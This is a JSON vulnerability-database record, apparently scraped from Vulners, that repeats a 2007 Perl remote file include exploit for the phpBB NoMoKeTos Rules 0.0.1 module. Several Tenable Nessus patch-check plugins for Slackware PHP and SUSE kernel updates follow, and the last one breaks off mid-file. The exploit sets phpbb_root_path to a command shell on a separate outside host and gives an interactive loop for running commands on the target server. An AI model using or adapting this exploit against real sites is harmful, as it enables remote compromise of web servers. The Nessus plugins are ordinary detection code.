{"published": "2007-02-24T00:00:00", "id": "1337DAY-ID-1541", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:26:21", "bulletin": {"published": "2007-02-24T00:00:00", "id": "1337DAY-ID-1541", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 1.2, "modified": "2016-04-20T01:26:21"}}, "hash": "8dabde63987cde17442d010d38fe5b44e5e09c3f11b3de65da31db31da639abc", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:26:21", "edition": 1, "title": "phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit", "href": "http://0day.today/exploit/description/1541", "modified": "2007-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/1541", "references": [], "reporter": "bd0rk", "sourceData": "==============================================================\r\nphpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n#phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n# \r\n#Coded by bd0rk || SOH-Crew\r\n#\r\n#Usage: exploit.pl [target] [cmd shell] [shell variable]\r\n#\r\n#Greetings: str0ke, TheJT, Kacper, Lu7k, Maik\r\n#\r\n#Vulnerable Code: include_once($phpbb_root_path . 'includes/functions_admin.'.$phpEx);\r\n#\r\n# vendor: http://www.nomoketo.de/MODs/nomoketos_rules.zip\r\n\r\nuse LWP::UserAgent;\r\n\r\n$Path = $ARGV[0];\r\n$Pathtocmd = $ARGV[1];\r\n$cmdv = $ARGV[2];\r\n\r\nif($Path!~/http:\\/\\// || $Pathtocmd!~/http:\\/\\// || !$cmdv){usage()}\r\n\r\nhead();\r\n\r\nwhile()\r\n{\r\n print \"[shell] \\$\";\r\nwhile(<STDIN>)\r\n {\r\n $cmd=$_;\r\n chomp($cmd);\r\n\r\n$xpl = LWP::UserAgent->new() or die;\r\n$req = HTTP::Request->new(GET =>$Path.'includes/functions_nomoketos_rules.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die \"\\nCould Not connect\\n\";\r\n\r\n$res = $xpl->request($req);\r\n$return = $res->content;\r\n$return =~ tr/[\\n]/[....]/;\r\n\r\nif (!$cmd) {print \"\\nPlease Enter a Command\\n\\n\"; $return =\"\";}\r\n\r\nelsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)\r\n {print \"\\nCould Not Connect to cmd Host or Invalid Command Variable\\n\";exit}\r\nelsif ($return =~/^<br.\\/>.<b>Fatal.error/) {print \"\\nInvalid Command or No Return\\n\\n\"}\r\n\r\nif($return =~ /(.*)/)\r\n\r\n\r\n{\r\n $finreturn = $1;\r\n $finreturn=~ tr/[....]/[\\n]/;\r\n print \"\\r\\n$finreturn\\n\\r\";\r\n last;\r\n}\r\n\r\nelse {print \"[shell] \\$\";}}}last;\r\n\r\nsub head()\r\n {\r\n print \"\\n============================================================================\\r\\n\";\r\n print \" *phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit*\\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n }\r\nsub usage()\r\n {\r\n head();\r\n print \" Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]\\r\\n\\n\";\r\n print \" <Site> - Full path to RulesMod ex: http://www.site.com/ \\r\\n\";\r\n print \" <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \\r\\n\";\r\n print \" <cmd variable> - Command variable used in php shell \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n print \" Bug Found by bd0rk \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n exit();\r\n }\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "15e78a929d12dc6b5162e0b5465eac81", "key": "sourceHref"}, {"hash": "f4b02ff9e05fad4a64bd9ed66832870d", "key": "sourceData"}, {"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1fbd135b75f2a209c9f9a055c787d28f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "fae425339b3edd56597ebdc6cd0d2cf4", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "30894eb60ec9170479037f799f3e38ce", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "19e650fbcefa871bc99b8cbb24edf027af698096c81f2f5af45745deac3f3ec1", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-03-09T23:30:25"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2018-1533-1.NASL", "SUSE_SU-2018-1517-1.NASL", "SUSE_SU-2018-1526-1.NASL", "SUSE_SU-2018-1509-1.NASL", "SUSE_SU-2018-1538-1.NASL", "SUSE_SU-2018-1514-1.NASL", "SUSE_SU-2018-1512-1.NASL", "SUSE_SU-2018-1531-1.NASL", "SUSE_SU-2018-1543-1.NASL", "SUSE_SU-2018-1519-1.NASL"]}], "modified": "2018-03-09T23:30:25"}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-03-09T23:30:25", "edition": 2, "title": "phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit", "href": "https://0day.today/exploit/description/1541", "modified": "2007-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/1541", "references": [], "reporter": "bd0rk", "sourceData": "==============================================================\r\nphpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n#phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n# \r\n#Coded by bd0rk || SOH-Crew\r\n#\r\n#Usage: exploit.pl [target] [cmd shell] [shell variable]\r\n#\r\n#Greetings: str0ke, TheJT, Kacper, Lu7k, Maik\r\n#\r\n#Vulnerable Code: include_once($phpbb_root_path . 'includes/functions_admin.'.$phpEx);\r\n#\r\n# vendor: http://www.nomoketo.de/MODs/nomoketos_rules.zip\r\n\r\nuse LWP::UserAgent;\r\n\r\n$Path = $ARGV[0];\r\n$Pathtocmd = $ARGV[1];\r\n$cmdv = $ARGV[2];\r\n\r\nif($Path!~/http:\\/\\// || $Pathtocmd!~/http:\\/\\// || !$cmdv){usage()}\r\n\r\nhead();\r\n\r\nwhile()\r\n{\r\n print \"[shell] \\$\";\r\nwhile(<STDIN>)\r\n {\r\n $cmd=$_;\r\n chomp($cmd);\r\n\r\n$xpl = LWP::UserAgent->new() or die;\r\n$req = HTTP::Request->new(GET =>$Path.'includes/functions_nomoketos_rules.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die \"\\nCould Not connect\\n\";\r\n\r\n$res = $xpl->request($req);\r\n$return = $res->content;\r\n$return =~ tr/[\\n]/[....]/;\r\n\r\nif (!$cmd) {print \"\\nPlease Enter a Command\\n\\n\"; $return =\"\";}\r\n\r\nelsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)\r\n {print \"\\nCould Not Connect to cmd Host or Invalid Command Variable\\n\";exit}\r\nelsif ($return =~/^<br.\\/>.<b>Fatal.error/) {print \"\\nInvalid Command or No Return\\n\\n\"}\r\n\r\nif($return =~ /(.*)/)\r\n\r\n\r\n{\r\n $finreturn = $1;\r\n $finreturn=~ tr/[....]/[\\n]/;\r\n print \"\\r\\n$finreturn\\n\\r\";\r\n last;\r\n}\r\n\r\nelse {print \"[shell] \\$\";}}}last;\r\n\r\nsub head()\r\n {\r\n print \"\\n============================================================================\\r\\n\";\r\n print \" *phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit*\\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n }\r\nsub usage()\r\n {\r\n head();\r\n print \" Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]\\r\\n\\n\";\r\n print \" <Site> - Full path to RulesMod ex: http://www.site.com/ \\r\\n\";\r\n print \" <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \\r\\n\";\r\n print \" <cmd variable> - Command variable used in php shell \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n print \" Bug Found by bd0rk \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n exit();\r\n }\r\n\r\n\r\n\n# 0day.today [2018-03-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "20ab6902bea464630dc722772e42e22b", "key": "href"}, {"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "modified"}, {"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "30894eb60ec9170479037f799f3e38ce", "key": "reporter"}, {"hash": "d5a7c0a3d69d22d80f7e2d5f93886837", "key": "sourceData"}, {"hash": "5bb5d8bdc72f87e45feece9d2c0d2948", "key": "sourceHref"}, {"hash": "1fbd135b75f2a209c9f9a055c787d28f", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"nessus": [{"lastseen": "2019-12-13T06:34:14", "bulletinFamily": "scanner", "description": "New php packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "modified": "2019-12-02T00:00:00", "id": "SLACKWARE_SSA_2018-201-01.NASL", "href": "https://www.tenable.com/plugins/nessus/111226", "published": "2018-07-23T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : php (SSA:2018-201-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-201-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111226);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/23 12:46:37\");\n\n script_xref(name:\"SSA\", value:\"2018-201-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : php (SSA:2018-201-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.421586\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdb94539\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"php\", pkgver:\"5.6.37\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.37\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"php\", pkgver:\"5.6.37\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.37\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"php\", pkgver:\"5.6.37\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.37\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"7.2.8\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"7.2.8\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T09:28:29", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_111 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1533-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110366", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1533-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1533-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110366);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1533-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_111 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181533-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d752502a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1036=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_111-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_111-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_111-default-5-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_111-xen-5-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:32", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_101 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1538-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110371", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1538-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1538-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110371);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1538-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_101 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181538-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1fa52e5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1045=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_101-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_101-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 